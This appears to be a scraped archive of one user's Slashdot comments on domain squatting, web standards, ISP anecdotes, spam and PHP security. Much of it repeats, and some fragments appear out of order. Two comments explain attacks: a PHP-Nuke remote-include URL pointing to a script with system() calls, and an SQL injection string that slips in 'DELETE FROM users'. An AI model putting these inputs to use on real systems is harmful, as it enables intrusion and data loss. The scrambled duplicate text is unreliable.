At least verisign (maybe others) will suspend your domain before it's released but after it's expired. If you forget to renew it all year and don't notice that it's expired then you gave it up on your own will, it's not stolen. It also helps get your domain back from squatters. The.com version of my domain has changed hands 3 times to 3 different squatters. If it was worth the $10+registraion cost to get it backordered I'd probably have it by now.
The similar names are stupid, not typos. Here's what I get when I put in slashdot.org:
slasheddot.com
freeslashdot.com
eslashdot.com
islashdot.com
clanslashdot.com
There are a lot of reasons to hate Verisign, the ones you said are not valid.
Except it's still trivial to do a download counter with that method despite the IE change. Just have your PHP script start the binary stream or (if it's 3rd party) give a real redirect instead of outputting an html redirect page. I do it all the time on my website (cheap plug: OSWD.org).
I always thought it was an excuse for download.com or whatever to put another banner ad in your face. They give the mirror thing even when there's only one download source available. Download.com doesn't need to care about leeching because they're just a collection of links to 3rd party servers.
I've seen these things at raves (here's a pic from a rave site). A lot of times they just put up the name of the dj or something. It wasn't any more obnoxious than the 40 necklaces and bracelets and huge stuffed spongebob pacifier that the candy ravers wear.
Are people still using NN4? I haven't seen it used, or anyone using it to access my site, in years. I think NN4 is an excuse for people that refuse to learn new web standards. NN4 shouldn't be any more of a factor than lynx these days. The next bad browser to get rid of is MSIE 5.x. MSIE 6 was released about 2 years ago. If you're going to use MSIE, please upgrade.
Not to confuse web standards with css and xhtml. Even a table based design should be compliant with standards. It just means there's a standard way of displaying your design, and the browser shouldn't have to guess how to display your site (which usually means they mess it up).
All that aside, XHTML/CSS is great. I find it easier to develop with, especially when making changes to an existing design. It's easier to parse as well. As a side effect, you can reduce bandwidth costs by using external style sheets. I dropped about 6KB per page off a post-mod_gzip 24KB page. My traffic isn't extreme, but it adds up to a few gigs per month. It's also saving my users bandwidth, which might be noticable with a dial-up user.
Re:Really Now..
on
Hardened PHP
·
· Score: 2, Insightful
Believe it or not PHP-Nuke had that exact behaviour about a year ago. The problem wasn't including ordinary files. The problem is with PHP you can include http files. So just make a request action=http://myserver/phpscript.php that had system() calls and you basically had a non interactive shell that could upload and execute files as the httpd user. Which is much closer to an exploit than including a/etc/passwd (which doesn't work in PHP either btw, unless the httpd user has read permissions on that file).
Eh? You don't even have to read the article on this one:
"The latest fax listed a number to call to take advantage of the offer (800-328-9795), so I called it and asked to be removed. The woman took down my number, but rather smugly told me that they are in England so they do not have to obey the US unsolicited fax laws.
They obviously don't care about sending unsolicited faxes.
If you're using PHP and magic quotes are enabled (which they are by default), then all get and post variables automatically get quoted for the database. So his
SELECT * FROM users WHERE user='username' and pass='';DELETE FROM users;SELECT''; would be turned into "SELECT... pass='\'; DELETE FROM users; SELECT\'';
Which would be the desired result. In Perl you can (and should) use the DBI's quote function.
One time we had a 6.8 magnitude earthquake and our server racks when flying, taking out the cables to our T1's (for dialup service). First, the provider calls out of chicago or something and asks why our T1's might be down. I said "Uhh... well we just had an earthquake." At first he was kinda quiet like... "is he kidding?" Combined with "boy do I look stupid." And then he finally said "Oh... well that's probably it." Yeah, no shit.
GET and POST doesn't help some stupid programming. For example, when PHP Nuke decided a cool feature would be to have the main template include files like news and forum. To use those you just did file=news.php. That's kinda stupid already. Then, PHP added support for opening sockets with include, so all you had to do was do file=http://myserver.com/hacks.php which made system calls. Now you're a local (but not interactive) user. Which is a lot closer to getting broken into. And stupid. That's what I'm getting at, there's a lot of stupid programmers out there.
Re:Great news, but..
on
JOE Hits 3.0
·
· Score: 2, Interesting
I was taught joe as my first editor, I haven't had to need to switch really. I can use it really well. But you're right, I usually have to request joe to have it installed on servers. I also recommend jpico to users who like the ease of pico with some more features. Although my joe teaacher switched to emacs. Maybe I'll switch sometime.
Maybe you're saying that because you haven't done any research. I worked for an ISP, for many years. More than once my boss decided that maintaining the list on the email server was too difficult and he should just open it up (and didn't tell me). After about a week of a couple people not being able to send email to server x and y, I figure it out, close the relay, go submit the server to the blacklists it's on. People blamed us because they couldn't send email, and we were the magic email thing in the sky. They don't know what a blacklist is, they don't care. They wanted us to fix it or we wouldn't be any use to them and they'd close their account. So yes, I believe blacklists are effective.
You're also making the assumption that the ISP doesn't know about spam and that they need a warning. I've had spammers email me and ask "Are you guys friendly towards mass mailings? (aka spam).", "I need DNS hosting for mass emails, I can take care of the servers, I just need DNS." Of course I told them no we didn't. And if they singed up for a regular account and we got a complaint, we had their cc number.
For a better analogy, think of someone providing a service, milk deliveries or something. Then one day the deliveries stop because there's a milk shortage, and they still expect you to pay for the milk you're not getting!
Slashdot? Secure like the time they forgot to change the default admin password and someone was able to exploit it. Or the time it was rooted before that. And parts of OSDN were broken into back when apache and all those other sites were broken into.
I used to work for a really small ISP with only a few employees.
My boss came up to me with an Access database of account transactions and wanting me to get a total by hand. I basically told him "uhhh... I think I'll write some code for that." He kinda scoffed and said "okay... but don't waste too much time on it." I'm more of a linux programmer, and didn't know enough about windows apps to interface with the DB, and I didn't know enough about Excel to do running totals through rows. So eventually I rigged up some VB code directly in Access, and that worked out alright. Took me a little over a day.
Another day he was excited because we got in Cobalt Raq servers. He wanted me to move the bigger commercial users (on RH) to this Raq server. I just couldn't figure out enough about the Raq API to enter hosts automatically, and ended doing each one by hand through the web interface, what a pain. My boss just wanted to be able to live without a real admin and use the web interface (makes sense, I guess).
Not as bad as most people, but that's about the worst of it. I also had to do tech support, but those stories are too common to be worth bringing up.
CSS is great. You don't need to have the people writing documentation to write CSS. You can store your documentation in XML, transform it to XHTML, and have someone, anyone, write a stylesheet for it. Something along these lines would be my favorite solution.
A much better tool would have been the age of current pot. I don't care if it's being heated or not when it's 12 hours old. And it's probably still hot if it was brewed 15 minutes ago and relatively full.
But NewsForge's Joe Barr discovered that the US is driving policy for the organization, and its official position is that 'using free software to achieve the WSIS goals might get in the way of an intellectual property owner's ability to make a profit'; in other words, they want to make the world safe for capitalism."
Where does it say that it's the offical position of the US that 'using free software to achieve the WSIS goals might get in the way of an intellectual property owner's ability to make a profit'? It's Joe Barr's interpretation, and the second half of that is the posters interpretation of Joe Barr's quote. I would like to see more quotes and references. The article is a lot like... a slashdot post.
I attended a presentation from a "computer crime center". They said that they go through a lot to make sure that the evidence isn't tampered with so it will be allowed in court. For example, they don't start your computer and start a search for kiddie porn. They open up your computer, take out the hard drive, make a copy of it, play with it, and document everything they did to reproduce their results.
Slashdot Mirror
Insightful my ass.
.com version of my domain has changed hands 3 times to 3 different squatters. If it was worth the $10+registraion cost to get it backordered I'd probably have it by now.
At least verisign (maybe others) will suspend your domain before it's released but after it's expired. If you forget to renew it all year and don't notice that it's expired then you gave it up on your own will, it's not stolen. It also helps get your domain back from squatters. The
The similar names are stupid, not typos. Here's what I get when I put in slashdot.org:
slasheddot.com
freeslashdot.com
eslashdot.com
islashdot.com
clanslashdot.com
There are a lot of reasons to hate Verisign, the ones you said are not valid.
slight alignment errors where the "author" was cutting and pasting bits of the image.
Also, the floating cubes look very suspicous. I think they may have been put in after the picture was taken.
Except it's still trivial to do a download counter with that method despite the IE change. Just have your PHP script start the binary stream or (if it's 3rd party) give a real redirect instead of outputting an html redirect page. I do it all the time on my website (cheap plug: OSWD.org).
I always thought it was an excuse for download.com or whatever to put another banner ad in your face. They give the mirror thing even when there's only one download source available. Download.com doesn't need to care about leeching because they're just a collection of links to 3rd party servers.
I've seen these things at raves (here's a pic from a rave site). A lot of times they just put up the name of the dj or something. It wasn't any more obnoxious than the 40 necklaces and bracelets and huge stuffed spongebob pacifier that the candy ravers wear.
now of available on thinkgeek?
Are people still using NN4? I haven't seen it used, or anyone using it to access my site, in years. I think NN4 is an excuse for people that refuse to learn new web standards. NN4 shouldn't be any more of a factor than lynx these days. The next bad browser to get rid of is MSIE 5.x. MSIE 6 was released about 2 years ago. If you're going to use MSIE, please upgrade.
Not to confuse web standards with css and xhtml. Even a table based design should be compliant with standards. It just means there's a standard way of displaying your design, and the browser shouldn't have to guess how to display your site (which usually means they mess it up).
All that aside, XHTML/CSS is great. I find it easier to develop with, especially when making changes to an existing design. It's easier to parse as well. As a side effect, you can reduce bandwidth costs by using external style sheets. I dropped about 6KB per page off a post-mod_gzip 24KB page. My traffic isn't extreme, but it adds up to a few gigs per month. It's also saving my users bandwidth, which might be noticable with a dial-up user.
Believe it or not PHP-Nuke had that exact behaviour about a year ago. The problem wasn't including ordinary files. The problem is with PHP you can include http files. So just make a request action=http://myserver/phpscript.php that had system() calls and you basically had a non interactive shell that could upload and execute files as the httpd user. Which is much closer to an exploit than including a /etc/passwd (which doesn't work in PHP either btw, unless the httpd user has read permissions on that file).
Eh? You don't even have to read the article on this one:
"The latest fax listed a number to call to take advantage of the offer (800-328-9795), so I called it and asked to be removed. The woman took down my number, but rather smugly told me that they are in England so they do not have to obey the US unsolicited fax laws.
They obviously don't care about sending unsolicited faxes.
If you're using PHP and magic quotes are enabled (which they are by default), then all get and post variables automatically get quoted for the database. So his
... pass='\'; DELETE FROM users; SELECT\'';
SELECT * FROM users WHERE user='username' and pass='';DELETE FROM users;SELECT'';
would be turned into
"SELECT
Which would be the desired result. In Perl you can (and should) use the DBI's quote function.
One time we had a 6.8 magnitude earthquake and our server racks when flying, taking out the cables to our T1's (for dialup service). First, the provider calls out of chicago or something and asks why our T1's might be down. I said "Uhh ... well we just had an earthquake." At first he was kinda quiet like ... "is he kidding?" Combined with "boy do I look stupid." And then he finally said "Oh ... well that's probably it." Yeah, no shit.
What? You don't have a website on how you got into his hotmail account? That'd be more interesting.
GET and POST doesn't help some stupid programming. For example, when PHP Nuke decided a cool feature would be to have the main template include files like news and forum. To use those you just did file=news.php. That's kinda stupid already. Then, PHP added support for opening sockets with include, so all you had to do was do file=http://myserver.com/hacks.php which made system calls. Now you're a local (but not interactive) user. Which is a lot closer to getting broken into. And stupid. That's what I'm getting at, there's a lot of stupid programmers out there.
I was taught joe as my first editor, I haven't had to need to switch really. I can use it really well. But you're right, I usually have to request joe to have it installed on servers. I also recommend jpico to users who like the ease of pico with some more features. Although my joe teaacher switched to emacs. Maybe I'll switch sometime.
Maybe you're saying that because you haven't done any research. I worked for an ISP, for many years. More than once my boss decided that maintaining the list on the email server was too difficult and he should just open it up (and didn't tell me). After about a week of a couple people not being able to send email to server x and y, I figure it out, close the relay, go submit the server to the blacklists it's on. People blamed us because they couldn't send email, and we were the magic email thing in the sky. They don't know what a blacklist is, they don't care. They wanted us to fix it or we wouldn't be any use to them and they'd close their account. So yes, I believe blacklists are effective.
You're also making the assumption that the ISP doesn't know about spam and that they need a warning. I've had spammers email me and ask "Are you guys friendly towards mass mailings? (aka spam).", "I need DNS hosting for mass emails, I can take care of the servers, I just need DNS." Of course I told them no we didn't. And if they singed up for a regular account and we got a complaint, we had their cc number.
For a better analogy, think of someone providing a service, milk deliveries or something. Then one day the deliveries stop because there's a milk shortage, and they still expect you to pay for the milk you're not getting!
Slashdot? Secure like the time they forgot to change the default admin password and someone was able to exploit it. Or the time it was rooted before that. And parts of OSDN were broken into back when apache and all those other sites were broken into.
That would be too easy. Have every 1 out of 1000 messages sent to a mailbox controlled by the spammer. No mail? Oops, no check.
his prize to "port Linux to the X-Box via a hardware and software approach"
Which Robertson so creatively called, "The X-Prize."
I used to work for a really small ISP with only a few employees.
My boss came up to me with an Access database of account transactions and wanting me to get a total by hand. I basically told him "uhhh... I think I'll write some code for that." He kinda scoffed and said "okay... but don't waste too much time on it." I'm more of a linux programmer, and didn't know enough about windows apps to interface with the DB, and I didn't know enough about Excel to do running totals through rows. So eventually I rigged up some VB code directly in Access, and that worked out alright. Took me a little over a day.
Another day he was excited because we got in Cobalt Raq servers. He wanted me to move the bigger commercial users (on RH) to this Raq server. I just couldn't figure out enough about the Raq API to enter hosts automatically, and ended doing each one by hand through the web interface, what a pain. My boss just wanted to be able to live without a real admin and use the web interface (makes sense, I guess).
Not as bad as most people, but that's about the worst of it. I also had to do tech support, but those stories are too common to be worth bringing up.
Smith at Law
Wait, you didn't correct this one? Shouldn't it be: "Smith at Penis Enlarging Pills and Law"?
CSS is great. You don't need to have the people writing documentation to write CSS. You can store your documentation in XML, transform it to XHTML, and have someone, anyone, write a stylesheet for it. Something along these lines would be my favorite solution.
Now my boss will know exactly when I'm slacking off. ... Submit!
A much better tool would have been the age of current pot. I don't care if it's being heated or not when it's 12 hours old. And it's probably still hot if it was brewed 15 minutes ago and relatively full.
But NewsForge's Joe Barr discovered that the US is driving policy for the organization, and its official position is that 'using free software to achieve the WSIS goals might get in the way of an intellectual property owner's ability to make a profit'; in other words, they want to make the world safe for capitalism."
... a slashdot post.
Where does it say that it's the offical position of the US that 'using free software to achieve the WSIS goals might get in the way of an intellectual property owner's ability to make a profit'? It's Joe Barr's interpretation, and the second half of that is the posters interpretation of Joe Barr's quote. I would like to see more quotes and references. The article is a lot like
How about starting RateTheStudents.com ?
What? Like a transcript?
I attended a presentation from a "computer crime center". They said that they go through a lot to make sure that the evidence isn't tampered with so it will be allowed in court. For example, they don't start your computer and start a search for kiddie porn. They open up your computer, take out the hard drive, make a copy of it, play with it, and document everything they did to reproduce their results.